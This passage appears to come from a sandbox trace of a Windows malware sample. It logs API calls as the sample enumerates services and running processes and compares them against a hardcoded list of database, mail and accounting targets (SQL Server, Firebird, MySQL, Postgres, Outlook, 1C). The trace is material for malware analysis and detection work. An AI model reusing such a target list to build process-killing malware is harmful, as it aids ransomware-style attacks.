returned -1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0039.664] lstrlenW (lpString="netprofm") returned 8 [0039.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0039.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0039.664] lstrlenW (lpString="NlaSvc") returned 6 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0039.665] lstrlenW (lpString="nsi") returned 3 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0039.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0039.665] lstrlenW (lpString="PcaSvc") returned 6 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0039.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0039.665] lstrlenW (lpString="PlugPlay") returned 8 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0039.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0039.665] lstrlenW (lpString="Power") returned 5 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0039.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0039.665] lstrlenW (lpString="ProfSvc") returned 7 [0039.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0039.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0039.665] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0039.665] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0039.666] lstrlenW (lpString="RpcEptMapper") returned 12 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.666] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0039.666] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0039.666] lstrlenW (lpString="RpcSs") returned 5 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0039.666] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0039.666] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0039.666] lstrlenW (lpString="SamSs") returned 5 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0039.666] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0039.666] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0039.666] lstrlenW (lpString="Schedule") returned 8 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0039.666] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0039.666] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0039.666] lstrlenW (lpString="SENS") returned 4 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0039.666] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0039.666] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0039.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0039.666] lstrlenW (lpString="ShellHWDetection") returned 16 [0039.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0039.667] lstrlenW (lpString="Spooler") returned 7 [0039.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0039.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0039.667] lstrlenW (lpString="SysMain") returned 7 [0039.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0039.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0039.667] lstrlenW (lpString="Themes") returned 6 [0039.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0039.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0039.667] lstrlenW (lpString="TrkWks") returned 6 [0039.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0039.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0039.667] lstrlenW (lpString="UxSms") returned 5 [0039.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0039.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0039.667] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0039.667] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0039.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0039.668] lstrlenW (lpString="VSS") returned 3 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0039.668] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0039.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0039.668] lstrlenW (lpString="WdiServiceHost") returned 14 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0039.668] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0039.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0039.668] lstrlenW (lpString="WdiSystemHost") returned 13 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0039.668] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0039.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0039.668] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0039.668] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0039.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0039.668] lstrlenW (lpString="Winmgmt") returned 7 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0039.668] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0039.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0039.668] lstrlenW (lpString="WPDBusEnum") returned 10 [0039.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.668] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0039.669] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0039.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0039.669] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3808fc0 | out: hHeap=0x5f0000) returned 1 [0039.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0039.671] Process32FirstW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0039.672] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0039.672] lstrlenW (lpString="System") returned 6 [0039.672] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0039.672] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0039.672] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0039.672] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0039.672] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0039.672] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0039.673] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0039.673] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0039.673] lstrlenW (lpString="smss.exe") returned 8 [0039.673] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0039.673] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0039.673] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.674] lstrlenW (lpString="csrss.exe") returned 9 [0039.674] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.674] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.674] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.674] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.674] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.674] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.674] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0039.674] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0039.675] lstrlenW (lpString="wininit.exe") returned 11 [0039.675] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0039.675] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0039.675] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.676] lstrlenW (lpString="csrss.exe") returned 9 [0039.676] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.676] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0039.677] lstrlenW (lpString="winlogon.exe") returned 12 [0039.677] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0039.677] lstrlenW (lpString="services.exe") returned 12 [0039.677] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0039.678] lstrlenW (lpString="lsass.exe") returned 9 [0039.678] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0039.678] lstrlenW (lpString="lsm.exe") returned 7 [0039.678] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.679] lstrlenW (lpString="svchost.exe") returned 11 [0039.679] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.680] lstrlenW (lpString="svchost.exe") returned 11 [0039.680] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.680] lstrlenW (lpString="svchost.exe") returned 11 [0039.680] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.681] lstrlenW (lpString="svchost.exe") returned 11 [0039.681] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.682] lstrlenW (lpString="svchost.exe") returned 11 [0039.682] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0039.682] lstrlenW (lpString="audiodg.exe") returned 11 [0039.682] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.683] lstrlenW (lpString="svchost.exe") returned 11 [0039.683] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.684] lstrlenW (lpString="svchost.exe") returned 11 [0039.684] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0039.684] lstrlenW (lpString="dwm.exe") returned 7 [0039.684] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0039.685] lstrlenW (lpString="explorer.exe") returned 12 [0039.685] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0039.686] lstrlenW (lpString="spoolsv.exe") returned 11 [0039.686] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.686] lstrlenW (lpString="taskhost.exe") returned 12 [0039.686] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.687] lstrlenW (lpString="svchost.exe") returned 11 [0039.687] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0039.687] lstrlenW (lpString="taskeng.exe") returned 11 [0039.687] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.688] lstrlenW (lpString="taskhost.exe") returned 12 [0039.688] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0039.689] lstrlenW (lpString="entrepreneur.exe") returned 16 [0039.689] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0039.689] lstrlenW (lpString="andrew kinds.exe") returned 16 [0039.689] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0039.690] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0039.690] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0039.691] lstrlenW (lpString="educated.exe") returned 12 [0039.691] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0039.691] lstrlenW (lpString="servers.exe") returned 11 [0039.691] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0039.692] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0039.692] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0039.693] lstrlenW (lpString="gbp_chair.exe") returned 13 [0039.693] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0039.693] lstrlenW (lpString="attention infected.exe") returned 22 [0039.693] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0039.694] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0039.694] Process32NextW (in: hSnapshot=0x170, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, 